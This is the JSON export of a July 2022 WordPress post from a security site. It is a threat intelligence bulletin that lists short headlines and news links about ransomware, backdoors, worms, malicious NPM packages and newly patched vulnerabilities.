{"id":92,"date":"2022-07-06T22:05:31","date_gmt":"2022-07-06T22:05:31","guid":{"rendered":"https:\/\/gcsecurity.us\/?p=92"},"modified":"2023-01-27T19:58:18","modified_gmt":"2023-01-27T19:58:18","slug":"security-bulletin-server-backdoors-worms-and-state-sponsored-threats","status":"publish","type":"post","link":"https:\/\/gcsecurity.us\/?p=92","title":{"rendered":"Threat Intelligence Bulletin &#8211; Server Backdoors, Worms, and State-sponsored Threats"},"content":{"rendered":"\n<p>Chinese cloud threat actor updates toolset to breach Linux servers to install crypto miners<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/thehackernews.com\/2022\/06\/microsoft-warns-of-cryptomining-malware.html\">https:\/\/thehackernews.com\/2022\/06\/microsoft-warns-of-cryptomining-malware.html<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>SessionManager malware exploits a ProxyLogon flaw to backdoor Exchange servers<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/thehackernews.com\/2022\/07\/new-sessionmanager-backdoor-targeting.html\">https:\/\/thehackernews.com\/2022\/07\/new-sessionmanager-backdoor-targeting.html<\/a><\/li><li><a href=\"https:\/\/www.darkreading.com\/attacks-breaches\/new-sessionmanager-exchange-server-backdoor-globally\">https:\/\/www.darkreading.com\/attacks-breaches\/new-sessionmanager-exchange-server-backdoor-globally<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Malicious NPM packages steal data from apps and web forms<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/thehackernews.com\/2022\/07\/researchers-uncover-malicious-npm.html\">https:\/\/thehackernews.com\/2022\/07\/researchers-uncover-malicious-npm.html<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>AstraLocker 2.0 using Word email attachments to infect devices in smash-n-grab strategy<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/astralocker-20-infects-users-directly-from-word-attachments\/\">https:\/\/www.bleepingcomputer.com\/news\/security\/astralocker-20-infects-users-directly-from-word-attachments\/<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Proof-of-concept exploit for CVE-2022-28219, a vulnerability in Zoho ManageEngine ADAudit Plus tool that can lead to RCE and compromise of Active Directory accounts<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/zoho-manageengine-adaudit-plus-bug-gets-public-rce-exploit\/\">https:\/\/www.bleepingcomputer.com\/news\/security\/zoho-manageengine-adaudit-plus-bug-gets-public-rce-exploit\/<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Microsoft details Raspberry Robin Windows worm which spreads via USB devices with a malicious .LNK file, seen in many organizations across various industries<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/microsoft-finds-raspberry-robin-worm-in-hundreds-of-windows-networks\/\">https:\/\/www.bleepingcomputer.com\/news\/security\/microsoft-finds-raspberry-robin-worm-in-hundreds-of-windows-networks\/<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Hive ransomware switches from GoLang to Rust, becoming more robust and prolific<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/thehackernews.com\/2022\/07\/hive-ransomware-upgrades-to-rust-for.html\">https:\/\/thehackernews.com\/2022\/07\/hive-ransomware-upgrades-to-rust-for.html<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Threat actors using legitimate adversary simulation software BRc4 to evade detection<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/thehackernews.com\/2022\/07\/hackers-abusing-brc4-red-team.html\">https:\/\/thehackernews.com\/2022\/07\/hackers-abusing-brc4-red-team.html<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Maintainers of OpenSSL release patches for high-severity RCE bug (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-2274\">CVE-2022-2274<\/a>)<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/thehackernews.com\/2022\/07\/openssl-releases-patch-for-high.html\">https:\/\/thehackernews.com\/2022\/07\/openssl-releases-patch-for-high.html<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>RedAlert ransomware campaign targeting corporate Windows and Linux VMWare ESXi servers<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/new-redalert-ransomware-targets-windows-linux-vmware-esxi-servers\/\">https:\/\/www.bleepingcomputer.com\/news\/security\/new-redalert-ransomware-targets-windows-linux-vmware-esxi-servers\/<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>State-sponsored threat actors targeting Healthcare organizations using Maui ransomware<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/us-govt-warns-of-maui-ransomware-attacks-against-healthcare-orgs\/\">https:\/\/www.bleepingcomputer.com\/news\/security\/us-govt-warns-of-maui-ransomware-attacks-against-healthcare-orgs\/<\/a><\/li><\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Possible state-sponsored threat group attacking corporate email environments by targeting trusted systems that do not support security software like AV or endpoint protection<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/securityintelligence.com\/news\/bulk-email-point-russian-espionage\/\">https:\/\/securityintelligence.com\/news\/bulk-email-point-russian-espionage\/<\/a><\/li><\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Chinese cloud threat actor updates toolset to breach Linux servers to install crypto miners https:\/\/thehackernews.com\/2022\/06\/microsoft-warns-of-cryptomining-malware.html SessionManager malware exploits a ProxyLogon flaw to backdoor Exchange servers https:\/\/thehackernews.com\/2022\/07\/new-sessionmanager-backdoor-targeting.html https:\/\/www.darkreading.com\/attacks-breaches\/new-sessionmanager-exchange-server-backdoor-globally Malicious NPM packages steal data from apps and web forms https:\/\/thehackernews.com\/2022\/07\/researchers-uncover-malicious-npm.html AstraLocker 2.0 using Word email attachments to infect devices in smash-n-grab strategy https:\/\/www.bleepingcomputer.com\/news\/security\/astralocker-20-infects-users-directly-from-word-attachments\/ Proof-of-concept exploit for CVE-2022-28219, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[15,14],"class_list":["post-92","post","type-post","status-publish","format-standard","hentry","category-news","tag-cybersecurity","tag-news"],"_links":{"self":[{"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/posts\/92","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=92"}],"version-history":[{"count":2,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/posts\/92\/revisions"}],"predecessor-version":[{"id":111,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=\/wp\/v2\/posts\/92\/revisions\/111"}],"wp:attachment":[{"href":"https:\/\/gcsecurity.us\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=92"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=92"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/gcsecurity.us\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=92"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}